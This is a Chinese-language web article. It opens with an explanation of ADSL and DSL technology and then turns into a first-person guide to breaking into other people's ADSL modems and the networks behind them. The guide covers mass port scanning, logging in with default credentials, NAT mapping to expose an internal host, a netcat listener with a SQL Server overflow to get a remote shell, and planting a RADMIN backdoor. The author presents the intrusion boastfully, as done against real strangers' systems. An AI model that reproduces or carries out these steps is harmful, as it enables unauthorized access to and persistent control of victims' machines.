什么是ADSL?

　　ADSL屬于DSL技術的一種，全稱Asymmetric Digital Subscriber Line( 非對稱數字用戶線路)，亦可稱作非對稱數字用戶環(huán)路。是一種新的數據傳輸方式。

　　ADSL技術提供的上行和下行帶寬不對稱，因此稱為非對稱數字用戶線路。

　　ADSL技術采用頻分復用技術把普通的電話線分成了電話、上行和下行三個相對獨立的信道，從而避免了相互之間的干擾。用戶可以邊打電話邊上網，不用擔心上網速率和通話質量下降的情況。理論上，ADSL 可在5 km 的范圍內，在一對銅纜雙絞線上提供最高1 Mbps的的上行速率和最高8Mbps的下行速率(也就是我們通常說的帶寬)，能同時提供話音和數據業(yè)務。

　　一般來說，ADSL 速率完全取決于線路的距離，線路越長，速率越低。

　　ADSL技術能夠充分利用現(xiàn)有PSTN(Public Switched Telephone Network ，公共交換電話網)，只須在線路兩端加裝ADSL設備即可為用戶提供高寬帶服務，無需重新布線，從而可極大地降低服務成本。同時ADSL用戶獨享帶寬，線路專用，不受用戶增加的影響。

　　最新的ADSL2+技術可以提供最高24Mbps的下行速率，和第一代ADSL 技術相比，ADSL2+打破了ADSL接入方式帶寬限制的瓶頸，在速率、距離、穩(wěn)定性、功率控制、維護管理等方面進行了改進，其應用范圍更加廣闊。

　　什么是DSL?

　　DSL的中文名是數字用戶線路，是以電話線為傳輸介質的傳輸技術組合。DSL技術在傳遞公用電話網絡的用戶環(huán)路上支持對稱和非對稱傳輸模式，解決了經常發(fā)生在網絡服務供應商和最終用戶間的“最后一公里”的傳輸瓶頸問題。由于DSL 接入方案無需對電話線路進行改造，可以充分利用可以已經被大量鋪設的電話用戶環(huán)路，大大降低額外的開銷。因此，利用銅纜電話線提供更高速率的因特網接入，更受用戶的歡迎，得到了各個方面的重視，在一些國家和地區(qū)得到大量應用。

　　DSL包括ADSL(Asymmetric Digital Subscriber Line，非對稱數字用戶線)、RADSL、HDSL和VDSL等等。

　　如何入侵ADSL?

　　一.掃描

　　現(xiàn)在很多ADSL MODEM都是通過 80 23 21 三個端口來管理，但80 21端口有很多服務器都有打開，沒怎么特征性，于是我選擇了23端口，打開我的至愛：SUPPERSCAN，填上我所在地區(qū)的IP段，(跨多幾段都沒關系，反正SUPPERSCAN的速度就是快)眨眼間，結果出來了，開23的主機還真不小?。?我挑了幾臺出來，在瀏覽器那里輸入IP：218.___.___.___，OK。登陸對話框出來了，輸入USER：ADSL pass:adsl1234(因為我這里的adsl modem一般是華碩的，缺省是adsl adsl1234)bingle 一矢中的，現(xiàn)在我就是上帝。

　　二.映射

　　入侵已經成功了一半，要進一步入侵內網，我們要進行端口映射，但是我連內網的拓撲，都不知道(更不用說內網主機的端口開放情況了)又怎么映射呢?在此，我選擇了猜測。一般來說，MODEM的內網IP缺省是192.168.1.1，而大多數就把自己主機的IP設成192.168.1.2。因此我們只要試試把192.168.1.2的端口映射出來就行了(但如果使用了dhcp就麻煩了)。但是192.168.1.2到底開放了什么端口，我們根本就不知道啊，呵呵，既然不知道，那么我就把他整臺主機透明地映射到外網，具體做法如下：進入NAT選項---添加NAT規(guī)則---BAMID---填入主機IP：192.168.1.2，到此192.168.1.2已經透明地映射到192.168.1.1上了，我們訪問ADSL MODEM就等于訪問主機192.168.1.2了

　　三.檢測

　　現(xiàn)在我們再請出SUPPERSCAN進行掃描，呵，看到沒有?掃描結果已經不同了，開放的端口是139 1433等，剛才只是開放了80 23 21 而已(也就是說我們的映射已經成功了)該是_-SCAN出手了，用它來掃弱口令最好不過了，但掃描的結果令人失望，一個弱口令也沒有，看來管理員還不算低B啊。

　　四.溢出

　　既然沒有弱口令，也沒開80，那只好從溢出方面著手了，但沒開80 21 也就webdav .sevr-u的溢出沒戲了，很自然，我向導了RPC溢出，但實踐證明RPC溢出也是不行的，LSASS溢出也不行 。

　　五.募然回首，那人卻在，燈火闌珊處

　　看來這管理員還是比較負責的，該打的補丁都打上了，這時侯，我的目光轉移到1433上了(嘿，不知道他打了SQL補丁沒有?)心動不如行動，現(xiàn)在只好死馬當活馬醫(yī)了，于是

　　nc -v -l 99

　　sql2 218.___.___.___ 0 218.___.___.___ 99

　　bingle 成功地得到一個shell了。

　　六.設置后門

　　到這里，我們的入侵已經成功了，余下的是掃尾留后門，至于后門，我一般都是用FTP上傳RADMIN上去